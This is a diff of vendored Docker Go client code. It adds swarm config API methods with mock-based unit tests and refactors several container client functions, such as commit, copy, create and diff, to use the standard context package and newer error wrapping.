b/vendor/github.com/docker/docker/client/config_create.go @@ -0,0 +1,25 @@ +package client // import "github.com/docker/docker/client" + +import ( + "context" + "encoding/json" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/swarm" +) + +// ConfigCreate creates a new Config. +func (cli *Client) ConfigCreate(ctx context.Context, config swarm.ConfigSpec) (types.ConfigCreateResponse, error) { + var response types.ConfigCreateResponse + if err := cli.NewVersionError("1.30", "config create"); err != nil { + return response, err + } + resp, err := cli.post(ctx, "/configs/create", nil, config, nil) + if err != nil { + return response, err + } + + err = json.NewDecoder(resp.body).Decode(&response) + ensureReaderClosed(resp) + return response, err +} diff --git a/vendor/github.com/docker/docker/client/config_create_test.go b/vendor/github.com/docker/docker/client/config_create_test.go new file mode 100644 index 0000000000..a6408792db --- /dev/null +++ b/vendor/github.com/docker/docker/client/config_create_test.go @@ -0,0 +1,70 @@ +package client // import "github.com/docker/docker/client" + +import ( + "bytes" + "context" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/swarm" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestConfigCreateUnsupported(t *testing.T) { + client := &Client{ + version: "1.29", + client: &http.Client{}, + } + _, err := client.ConfigCreate(context.Background(), swarm.ConfigSpec{}) + assert.Check(t, is.Error(err, `"config create" requires API version 1.30, but the Docker daemon API version is 1.29`)) +} + +func TestConfigCreateError(t *testing.T) { + client := &Client{ + version: "1.30", + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + _, err := client.ConfigCreate(context.Background(), swarm.ConfigSpec{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestConfigCreate(t *testing.T) { + expectedURL := "/v1.30/configs/create" + client := &Client{ + version: "1.30", + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + if req.Method != "POST" { + return nil, fmt.Errorf("expected POST method, got %s", req.Method) + } + b, err := json.Marshal(types.ConfigCreateResponse{ + ID: "test_config", + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusCreated, + Body: ioutil.NopCloser(bytes.NewReader(b)), + }, nil + }), + } + + r, err := client.ConfigCreate(context.Background(), swarm.ConfigSpec{}) + if err != nil { + t.Fatal(err) + } + if r.ID != "test_config" { + t.Fatalf("expected `test_config`, got %s", r.ID) + } +} diff --git a/vendor/github.com/docker/docker/client/config_inspect.go b/vendor/github.com/docker/docker/client/config_inspect.go new file mode 100644 index 0000000000..4ac566ad89 --- /dev/null +++ b/vendor/github.com/docker/docker/client/config_inspect.go @@ -0,0 +1,36 @@ +package client // import "github.com/docker/docker/client" + +import ( + "bytes" + "context" + "encoding/json" + "io/ioutil" + + "github.com/docker/docker/api/types/swarm" +) + +// ConfigInspectWithRaw returns the config information with raw data +func (cli *Client) ConfigInspectWithRaw(ctx context.Context, id string) (swarm.Config, []byte, error) { + if id == "" { + return swarm.Config{}, nil, objectNotFoundError{object: "config", id: id} + } + if err := cli.NewVersionError("1.30", "config inspect"); err != nil { + return swarm.Config{}, nil, err + } + resp, err := cli.get(ctx, "/configs/"+id, nil, nil) + if err != nil { + return swarm.Config{}, nil, wrapResponseError(err, resp, "config", id) + } + defer ensureReaderClosed(resp) + + body, err := ioutil.ReadAll(resp.body) + if err != nil { + return swarm.Config{}, nil, err + } + + var config swarm.Config + rdr := bytes.NewReader(body) + err = json.NewDecoder(rdr).Decode(&config) + + return config, body, err +} diff --git a/vendor/github.com/docker/docker/client/config_inspect_test.go b/vendor/github.com/docker/docker/client/config_inspect_test.go new file mode 100644 index 0000000000..76a5dae9e5 --- /dev/null +++ b/vendor/github.com/docker/docker/client/config_inspect_test.go @@ -0,0 +1,103 @@ +package client // import "github.com/docker/docker/client" + +import ( + "bytes" + "context" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types/swarm" + "github.com/pkg/errors" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestConfigInspectNotFound(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusNotFound, "Server error")), + } + + _, _, err := client.ConfigInspectWithRaw(context.Background(), "unknown") + if err == nil || !IsErrNotFound(err) { + t.Fatalf("expected a NotFoundError error, got %v", err) + } +} + +func TestConfigInspectWithEmptyID(t *testing.T) { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + return nil, errors.New("should not make request") + }), + } + _, _, err := client.ConfigInspectWithRaw(context.Background(), "") + if !IsErrNotFound(err) { + t.Fatalf("Expected NotFoundError, got %v", err) + } +} + +func TestConfigInspectUnsupported(t *testing.T) { + client := &Client{ + version: "1.29", + client: &http.Client{}, + } + _, _, err := client.ConfigInspectWithRaw(context.Background(), "nothing") + assert.Check(t, is.Error(err, `"config inspect" requires API version 1.30, but the Docker daemon API version is 1.29`)) +} + +func TestConfigInspectError(t *testing.T) { + client := &Client{ + version: "1.30", + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + _, _, err := client.ConfigInspectWithRaw(context.Background(), "nothing") + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestConfigInspectConfigNotFound(t *testing.T) { + client := &Client{ + version: "1.30", + client: newMockClient(errorMock(http.StatusNotFound, "Server error")), + } + + _, _, err := client.ConfigInspectWithRaw(context.Background(), "unknown") + if err == nil || !IsErrNotFound(err) { + t.Fatalf("expected a configNotFoundError error, got %v", err) + } +} + +func TestConfigInspect(t *testing.T) { + expectedURL := "/v1.30/configs/config_id" + client := &Client{ + version: "1.30", + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("expected URL '%s', got '%s'", expectedURL, req.URL) + } + content, err := json.Marshal(swarm.Config{ + ID: "config_id", + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(content)), + }, nil + }), + } + + configInspect, _, err := client.ConfigInspectWithRaw(context.Background(), "config_id") + if err != nil { + t.Fatal(err) + } + if configInspect.ID != "config_id" { + t.Fatalf("expected `config_id`, got %s", configInspect.ID) + } +} diff --git a/vendor/github.com/docker/docker/client/config_list.go b/vendor/github.com/docker/docker/client/config_list.go new file mode 100644 index 0000000000..2b9d54606b --- /dev/null +++ b/vendor/github.com/docker/docker/client/config_list.go @@ -0,0 +1,38 @@ +package client // import "github.com/docker/docker/client" + +import ( + "context" + "encoding/json" + "net/url" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/api/types/swarm" +) + +// ConfigList returns the list of configs. +func (cli *Client) ConfigList(ctx context.Context, options types.ConfigListOptions) ([]swarm.Config, error) { + if err := cli.NewVersionError("1.30", "config list"); err != nil { + return nil, err + } + query := url.Values{} + + if options.Filters.Len() > 0 { + filterJSON, err := filters.ToJSON(options.Filters) + if err != nil { + return nil, err + } + + query.Set("filters", filterJSON) + } + + resp, err := cli.get(ctx, "/configs", query, nil) + if err != nil { + return nil, err + } + + var configs []swarm.Config + err = json.NewDecoder(resp.body).Decode(&configs) + ensureReaderClosed(resp) + return configs, err +} diff --git a/vendor/github.com/docker/docker/client/config_list_test.go b/vendor/github.com/docker/docker/client/config_list_test.go new file mode 100644 index 0000000000..b35a592953 --- /dev/null +++ b/vendor/github.com/docker/docker/client/config_list_test.go @@ -0,0 +1,107 @@ +package client // import "github.com/docker/docker/client" + +import ( + "bytes" + "context" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/api/types/swarm" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestConfigListUnsupported(t *testing.T) { + client := &Client{ + version: "1.29", + client: &http.Client{}, + } + _, err := client.ConfigList(context.Background(), types.ConfigListOptions{}) + assert.Check(t, is.Error(err, `"config list" requires API version 1.30, but the Docker daemon API version is 1.29`)) +} + +func TestConfigListError(t *testing.T) { + client := &Client{ + version: "1.30", + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + _, err := client.ConfigList(context.Background(), types.ConfigListOptions{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestConfigList(t *testing.T) { + expectedURL := "/v1.30/configs" + + filters := filters.NewArgs() + filters.Add("label", "label1") + filters.Add("label", "label2") + + listCases := []struct { + options types.ConfigListOptions + expectedQueryParams map[string]string + }{ + { + options: types.ConfigListOptions{}, + expectedQueryParams: map[string]string{ + "filters": "", + }, + }, + { + options: types.ConfigListOptions{ + Filters: filters, + }, + expectedQueryParams: map[string]string{ + "filters": `{"label":{"label1":true,"label2":true}}`, + }, + }, + } + for _, listCase := range listCases { + client := &Client{ + version: "1.30", + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + query := req.URL.Query() + for key, expected := range listCase.expectedQueryParams { + actual := query.Get(key) + if actual != expected { + return nil, fmt.Errorf("%s not set in URL query properly. Expected '%s', got %s", key, expected, actual) + } + } + content, err := json.Marshal([]swarm.Config{ + { + ID: "config_id1", + }, + { + ID: "config_id2", + }, + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(content)), + }, nil + }), + } + + configs, err := client.ConfigList(context.Background(), listCase.options) + if err != nil { + t.Fatal(err) + } + if len(configs) != 2 { + t.Fatalf("expected 2 configs, got %v", configs) + } + } +} diff --git a/vendor/github.com/docker/docker/client/config_remove.go b/vendor/github.com/docker/docker/client/config_remove.go new file mode 100644 index 0000000000..a96871e98b --- /dev/null +++ b/vendor/github.com/docker/docker/client/config_remove.go @@ -0,0 +1,13 @@ +package client // import "github.com/docker/docker/client" + +import "context" + +// ConfigRemove removes a Config. +func (cli *Client) ConfigRemove(ctx context.Context, id string) error { + if err := cli.NewVersionError("1.30", "config remove"); err != nil { + return err + } + resp, err := cli.delete(ctx, "/configs/"+id, nil, nil) + ensureReaderClosed(resp) + return wrapResponseError(err, resp, "config", id) +} diff --git a/vendor/github.com/docker/docker/client/config_remove_test.go b/vendor/github.com/docker/docker/client/config_remove_test.go new file mode 100644 index 0000000000..9c0c0f9337 --- /dev/null +++ b/vendor/github.com/docker/docker/client/config_remove_test.go @@ -0,0 +1,60 @@ +package client // import "github.com/docker/docker/client" + +import ( + "bytes" + "context" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestConfigRemoveUnsupported(t *testing.T) { + client := &Client{ + version: "1.29", + client: &http.Client{}, + } + err := client.ConfigRemove(context.Background(), "config_id") + assert.Check(t, is.Error(err, `"config remove" requires API version 1.30, but the Docker daemon API version is 1.29`)) +} + +func TestConfigRemoveError(t *testing.T) { + client := &Client{ + version: "1.30", + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + err := client.ConfigRemove(context.Background(), "config_id") + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestConfigRemove(t *testing.T) { + expectedURL := "/v1.30/configs/config_id" + + client := &Client{ + version: "1.30", + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + if req.Method != "DELETE" { + return nil, fmt.Errorf("expected DELETE method, got %s", req.Method) + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte("body"))), + }, nil + }), + } + + err := client.ConfigRemove(context.Background(), "config_id") + if err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/client/config_update.go b/vendor/github.com/docker/docker/client/config_update.go new file mode 100644 index 0000000000..39e59cf858 --- /dev/null +++ b/vendor/github.com/docker/docker/client/config_update.go @@ -0,0 +1,21 @@ +package client // import "github.com/docker/docker/client" + +import ( + "context" + "net/url" + "strconv" + + "github.com/docker/docker/api/types/swarm" +) + +// ConfigUpdate attempts to update a Config +func (cli *Client) ConfigUpdate(ctx context.Context, id string, version swarm.Version, config swarm.ConfigSpec) error { + if err := cli.NewVersionError("1.30", "config update"); err != nil { + return err + } + query := url.Values{} + query.Set("version", strconv.FormatUint(version.Index, 10)) + resp, err := cli.post(ctx, "/configs/"+id+"/update", query, config, nil) + ensureReaderClosed(resp) + return err +} diff --git a/vendor/github.com/docker/docker/client/config_update_test.go b/vendor/github.com/docker/docker/client/config_update_test.go new file mode 100644 index 0000000000..1299f8278c --- /dev/null +++ b/vendor/github.com/docker/docker/client/config_update_test.go @@ -0,0 +1,61 @@ +package client // import "github.com/docker/docker/client" + +import ( + "bytes" + "context" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types/swarm" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestConfigUpdateUnsupported(t *testing.T) { + client := &Client{ + version: "1.29", + client: &http.Client{}, + } + err := client.ConfigUpdate(context.Background(), "config_id", swarm.Version{}, swarm.ConfigSpec{}) + assert.Check(t, is.Error(err, `"config update" requires API version 1.30, but the Docker daemon API version is 1.29`)) +} + +func TestConfigUpdateError(t *testing.T) { + client := &Client{ + version: "1.30", + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + err := client.ConfigUpdate(context.Background(), "config_id", swarm.Version{}, swarm.ConfigSpec{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestConfigUpdate(t *testing.T) { + expectedURL := "/v1.30/configs/config_id/update" + + client := &Client{ + version: "1.30", + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + if req.Method != "POST" { + return nil, fmt.Errorf("expected POST method, got %s", req.Method) + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte("body"))), + }, nil + }), + } + + err := client.ConfigUpdate(context.Background(), "config_id", swarm.Version{}, swarm.ConfigSpec{}) + if err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/client/container_attach.go b/vendor/github.com/docker/docker/client/container_attach.go index eea4682158..88ba1ef639 100644 --- a/vendor/github.com/docker/docker/client/container_attach.go +++ b/vendor/github.com/docker/docker/client/container_attach.go @@ -1,16 +1,36 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "net/url" "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) // ContainerAttach attaches a connection to a container in the server. // It returns a types.HijackedConnection with the hijacked connection // and the a reader to get output. It's up to the called to close // the hijacked connection by calling types.HijackedResponse.Close. +// +// The stream format on the response will be in one of two formats: +// +// If the container is using a TTY, there is only a single stream (stdout), and +// data is copied directly from the container output stream, no extra +// multiplexing or headers. +// +// If the container is *not* using a TTY, streams for stdout and stderr are +// multiplexed. +// The format of the multiplexed stream is as follows: +// +// [8]byte{STREAM_TYPE, 0, 0, 0, SIZE1, SIZE2, SIZE3, SIZE4}[]byte{OUTPUT} +// +// STREAM_TYPE can be 1 for stdout and 2 for stderr +// +// SIZE1, SIZE2, SIZE3, and SIZE4 are four bytes of uint32 encoded as big endian. +// This is the size of OUTPUT. +// +// You can use github.com/docker/docker/pkg/stdcopy.StdCopy to demultiplex this +// stream. func (cli *Client) ContainerAttach(ctx context.Context, container string, options types.ContainerAttachOptions) (types.HijackedResponse, error) { query := url.Values{} if options.Stream { diff --git a/vendor/github.com/docker/docker/client/container_commit.go b/vendor/github.com/docker/docker/client/container_commit.go index c766d62e40..377a2ea681 100644 --- a/vendor/github.com/docker/docker/client/container_commit.go +++ b/vendor/github.com/docker/docker/client/container_commit.go @@ -1,31 +1,33 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" "errors" "net/url" - distreference "github.com/docker/distribution/reference" + "github.com/docker/distribution/reference" "github.com/docker/docker/api/types" - "github.com/docker/docker/api/types/reference" - "golang.org/x/net/context" ) // ContainerCommit applies changes into a container and creates a new tagged image. func (cli *Client) ContainerCommit(ctx context.Context, container string, options types.ContainerCommitOptions) (types.IDResponse, error) { var repository, tag string if options.Reference != "" { - distributionRef, err := distreference.ParseNamed(options.Reference) + ref, err := reference.ParseNormalizedNamed(options.Reference) if err != nil { return types.IDResponse{}, err } - if _, isCanonical := distributionRef.(distreference.Canonical); isCanonical { + if _, isCanonical := ref.(reference.Canonical); isCanonical { return types.IDResponse{}, errors.New("refusing to create a tag with a digest reference") } + ref = reference.TagNameOnly(ref) - tag = reference.GetTagFromNamedRef(distributionRef) - repository = distributionRef.Name() + if tagged, ok := ref.(reference.Tagged); ok { + tag = tagged.Tag() + } + repository = reference.FamiliarName(ref) } query := url.Values{} @@ -37,7 +39,7 @@ func (cli *Client) ContainerCommit(ctx context.Context, container string, option for _, change := range options.Changes { query.Add("changes", change) } - if options.Pause != true { + if !options.Pause { query.Set("pause", "0") } diff --git a/vendor/github.com/docker/docker/client/container_commit_test.go b/vendor/github.com/docker/docker/client/container_commit_test.go index a844675368..8e3fe8b730 100644 --- a/vendor/github.com/docker/docker/client/container_commit_test.go +++ b/vendor/github.com/docker/docker/client/container_commit_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -10,7 +11,6 @@ import ( "testing" "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) func TestContainerCommitError(t *testing.T) { @@ -91,6 +91,6 @@ func TestContainerCommit(t *testing.T) { t.Fatal(err) } if r.ID != "new_container_id" { - t.Fatalf("expected `container_id`, got %s", r.ID) + t.Fatalf("expected `new_container_id`, got %s", r.ID) } } diff --git a/vendor/github.com/docker/docker/client/container_copy.go b/vendor/github.com/docker/docker/client/container_copy.go index 8380eeabc9..d706260cee 100644 --- a/vendor/github.com/docker/docker/client/container_copy.go +++ b/vendor/github.com/docker/docker/client/container_copy.go @@ -1,6 +1,7 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/base64" "encoding/json" "fmt" @@ -10,8 +11,6 @@ import ( "path/filepath" "strings" - "golang.org/x/net/context" - "github.com/docker/docker/api/types" ) @@ -20,29 +19,34 @@ func (cli *Client) ContainerStatPath(ctx context.Context, containerID, path stri query := url.Values{} query.Set("path", filepath.ToSlash(path)) // Normalize the paths used in the API. - urlStr := fmt.Sprintf("/containers/%s/archive", containerID) + urlStr := "/containers/" + containerID + "/archive" response, err := cli.head(ctx, urlStr, query, nil) if err != nil { - return types.ContainerPathStat{}, err + return types.ContainerPathStat{}, wrapResponseError(err, response, "container:path", containerID+":"+path) } defer ensureReaderClosed(response) return getContainerPathStatFromHeader(response.header) } // CopyToContainer copies content into the container filesystem. -func (cli *Client) CopyToContainer(ctx context.Context, container, path string, content io.Reader, options types.CopyToContainerOptions) error { +// Note that `content` must be a Reader for a TAR archive +func (cli *Client) CopyToContainer(ctx context.Context, containerID, dstPath string, content io.Reader, options types.CopyToContainerOptions) error { query := url.Values{} - query.Set("path", filepath.ToSlash(path)) // Normalize the paths used in the API. + query.Set("path", filepath.ToSlash(dstPath)) // Normalize the paths used in the API. // Do not allow for an existing directory to be overwritten by a non-directory and vice versa. if !options.AllowOverwriteDirWithFile { query.Set("noOverwriteDirNonDir", "true") } - apiPath := fmt.Sprintf("/containers/%s/archive", container) + if options.CopyUIDGID { + query.Set("copyUIDGID", "true") + } + + apiPath := "/containers/" + containerID + "/archive" response, err := cli.putRaw(ctx, apiPath, query, content, nil) if err != nil { - return err + return wrapResponseError(err, response, "container:path", containerID+":"+dstPath) } defer ensureReaderClosed(response) @@ -54,15 +58,15 @@ func (cli *Client) CopyToContainer(ctx context.Context, container, path string, } // CopyFromContainer gets the content from the container and returns it as a Reader -// to manipulate it in the host. It's up to the caller to close the reader. -func (cli *Client) CopyFromContainer(ctx context.Context, container, srcPath string) (io.ReadCloser, types.ContainerPathStat, error) { +// for a TAR archive to manipulate it in the host. It's up to the caller to close the reader. +func (cli *Client) CopyFromContainer(ctx context.Context, containerID, srcPath string) (io.ReadCloser, types.ContainerPathStat, error) { query := make(url.Values, 1) query.Set("path", filepath.ToSlash(srcPath)) // Normalize the paths used in the API. - apiPath := fmt.Sprintf("/containers/%s/archive", container) + apiPath := "/containers/" + containerID + "/archive" response, err := cli.get(ctx, apiPath, query, nil) if err != nil { - return nil, types.ContainerPathStat{}, err + return nil, types.ContainerPathStat{}, wrapResponseError(err, response, "container:path", containerID+":"+srcPath) } if response.statusCode != http.StatusOK { diff --git a/vendor/github.com/docker/docker/client/container_copy_test.go b/vendor/github.com/docker/docker/client/container_copy_test.go index 706a20c818..efddbef20d 100644 --- a/vendor/github.com/docker/docker/client/container_copy_test.go +++ b/vendor/github.com/docker/docker/client/container_copy_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/base64" "encoding/json" "fmt" @@ -10,8 +11,6 @@ import ( "strings" "testing" - "golang.org/x/net/context" - "github.com/docker/docker/api/types" ) @@ -25,6 +24,16 @@ func TestContainerStatPathError(t *testing.T) { } } +func TestContainerStatPathNotFoundError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusNotFound, "Not found")), + } + _, err := client.ContainerStatPath(context.Background(), "container_id", "path") + if !IsErrNotFound(err) { + t.Fatalf("expected a not found error, got %v", err) + } +} + func TestContainerStatPathNoHeaderError(t *testing.T) { client := &Client{ client: newMockClient(func(req *http.Request) (*http.Response, error) { @@ -95,6 +104,16 @@ func TestCopyToContainerError(t *testing.T) { } } +func TestCopyToContainerNotFoundError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusNotFound, "Not found")), + } + err := client.CopyToContainer(context.Background(), "container_id", "path/to/file", bytes.NewReader([]byte("")), types.CopyToContainerOptions{}) + if !IsErrNotFound(err) { + t.Fatalf("expected a not found error, got %v", err) + } +} + func TestCopyToContainerNotStatusOKError(t *testing.T) { client := &Client{ client: newMockClient(errorMock(http.StatusNoContent, "No content")), @@ -161,6 +180,16 @@ func TestCopyFromContainerError(t *testing.T) { } } +func TestCopyFromContainerNotFoundError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusNotFound, "Not found")), + } + _, _, err := client.CopyFromContainer(context.Background(), "container_id", "path/to/file") + if !IsErrNotFound(err) { + t.Fatalf("expected a not found error, got %v", err) + } +} + func TestCopyFromContainerNotStatusOKError(t *testing.T) { client := &Client{ client: newMockClient(errorMock(http.StatusNoContent, "No content")), @@ -195,7 +224,7 @@ func TestCopyFromContainer(t *testing.T) { return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) } if req.Method != "GET" { - return nil, fmt.Errorf("expected PUT method, got %s", req.Method) + return nil, fmt.Errorf("expected GET method, got %s", req.Method) } query := req.URL.Query() path := query.Get("path") diff --git a/vendor/github.com/docker/docker/client/container_create.go b/vendor/github.com/docker/docker/client/container_create.go index 9f627aafa6..d269a61894 100644 --- a/vendor/github.com/docker/docker/client/container_create.go +++ b/vendor/github.com/docker/docker/client/container_create.go @@ -1,13 +1,14 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" "net/url" "strings" "github.com/docker/docker/api/types/container" "github.com/docker/docker/api/types/network" - "golang.org/x/net/context" + "github.com/docker/docker/api/types/versions" ) type configWrapper struct { @@ -25,6 +26,11 @@ func (cli *Client) ContainerCreate(ctx context.Context, config *container.Config return response, err } + // When using API 1.24 and under, the client is responsible for removing the container + if hostConfig != nil && versions.LessThan(cli.ClientVersion(), "1.25") { + hostConfig.AutoRemove = false + } + query := url.Values{} if containerName != "" { query.Set("name", containerName) @@ -39,7 +45,7 @@ func (cli *Client) ContainerCreate(ctx context.Context, config *container.Config serverResp, err := cli.post(ctx, "/containers/create", query, body, nil) if err != nil { if serverResp.statusCode == 404 && strings.Contains(err.Error(), "No such image") { - return response, imageNotFoundError{config.Image} + return response, objectNotFoundError{object: "image", id: config.Image} } return response, err } diff --git a/vendor/github.com/docker/docker/client/container_create_test.go b/vendor/github.com/docker/docker/client/container_create_test.go index 15dbd5ea01..d46e70492d 100644 --- a/vendor/github.com/docker/docker/client/container_create_test.go +++ b/vendor/github.com/docker/docker/client/container_create_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -10,7 +11,6 @@ import ( "testing" "github.com/docker/docker/api/types/container" - "golang.org/x/net/context" ) func TestContainerCreateError(t *testing.T) { @@ -22,7 +22,7 @@ func TestContainerCreateError(t *testing.T) { t.Fatalf("expected a Server Error while testing StatusInternalServerError, got %v", err) } - // 404 doesn't automagitally means an unknown image + // 404 doesn't automatically means an unknown image client = &Client{ client: newMockClient(errorMock(http.StatusNotFound, "Server error")), } @@ -37,7 +37,7 @@ func TestContainerCreateImageNotFound(t *testing.T) { client: newMockClient(errorMock(http.StatusNotFound, "No such image")), } _, err := client.ContainerCreate(context.Background(), &container.Config{Image: "unknown_image"}, nil, nil, "unknown") - if err == nil || !IsErrImageNotFound(err) { + if err == nil || !IsErrNotFound(err) { t.Fatalf("expected an imageNotFound error, got %v", err) } } @@ -74,3 +74,45 @@ func TestContainerCreateWithName(t *testing.T) { t.Fatalf("expected `container_id`, got %s", r.ID) } } + +// TestContainerCreateAutoRemove validates that a client using API 1.24 always disables AutoRemove. When using API 1.25 +// or up, AutoRemove should not be disabled. +func TestContainerCreateAutoRemove(t *testing.T) { + autoRemoveValidator := func(expectedValue bool) func(req *http.Request) (*http.Response, error) { + return func(req *http.Request) (*http.Response, error) { + var config configWrapper + + if err := json.NewDecoder(req.Body).Decode(&config); err != nil { + return nil, err + } + if config.HostConfig.AutoRemove != expectedValue { + return nil, fmt.Errorf("expected AutoRemove to be %v, got %v", expectedValue, config.HostConfig.AutoRemove) + } + b, err := json.Marshal(container.ContainerCreateCreatedBody{ + ID: "container_id", + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(b)), + }, nil + } + } + + client := &Client{ + client: newMockClient(autoRemoveValidator(false)), + version: "1.24", + } + if _, err := client.ContainerCreate(context.Background(), nil, &container.HostConfig{AutoRemove: true}, nil, ""); err != nil { + t.Fatal(err) + } + client = &Client{ + client: newMockClient(autoRemoveValidator(true)), + version: "1.25", + } + if _, err := client.ContainerCreate(context.Background(), nil, &container.HostConfig{AutoRemove: true}, nil, ""); err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/client/container_diff.go b/vendor/github.com/docker/docker/client/container_diff.go index 1e3e554fc5..3b7c90c96c 100644 --- a/vendor/github.com/docker/docker/client/container_diff.go +++ b/vendor/github.com/docker/docker/client/container_diff.go @@ -1,16 +1,16 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" "net/url" - "github.com/docker/docker/api/types" - "golang.org/x/net/context" + "github.com/docker/docker/api/types/container" ) // ContainerDiff shows differences in a container filesystem since it was started. -func (cli *Client) ContainerDiff(ctx context.Context, containerID string) ([]types.ContainerChange, error) { - var changes []types.ContainerChange +func (cli *Client) ContainerDiff(ctx context.Context, containerID string) ([]container.ContainerChangeResponseItem, error) { + var changes []container.ContainerChangeResponseItem serverResp, err := cli.get(ctx, "/containers/"+containerID+"/changes", url.Values{}, nil) if err != nil { diff --git a/vendor/github.com/docker/docker/client/container_diff_test.go b/vendor/github.com/docker/docker/client/container_diff_test.go index 1ce1117684..ac215f3403 100644 --- a/vendor/github.com/docker/docker/client/container_diff_test.go +++ b/vendor/github.com/docker/docker/client/container_diff_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -9,8 +10,7 @@ import ( "strings" "testing" - "github.com/docker/docker/api/types" - "golang.org/x/net/context" + "github.com/docker/docker/api/types/container" ) func TestContainerDiffError(t *testing.T) { @@ -31,7 +31,7 @@ func TestContainerDiff(t *testing.T) { if !strings.HasPrefix(req.URL.Path, expectedURL) { return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) } - b, err := json.Marshal([]types.ContainerChange{ + b, err := json.Marshal([]container.ContainerChangeResponseItem{ { Kind: 0, Path: "/path/1", diff --git a/vendor/github.com/docker/docker/client/container_exec.go b/vendor/github.com/docker/docker/client/container_exec.go index 0665c54fbd..535536b1e0 100644 --- a/vendor/github.com/docker/docker/client/container_exec.go +++ b/vendor/github.com/docker/docker/client/container_exec.go @@ -1,10 +1,10 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) // ContainerExecCreate creates a new exec configuration to run an exec process. @@ -35,7 +35,7 @@ func (cli *Client) ContainerExecStart(ctx context.Context, execID string, config // It returns a types.HijackedConnection with the hijacked connection // and the a reader to get output. It's up to the called to close // the hijacked connection by calling types.HijackedResponse.Close. -func (cli *Client) ContainerExecAttach(ctx context.Context, execID string, config types.ExecConfig) (types.HijackedResponse, error) { 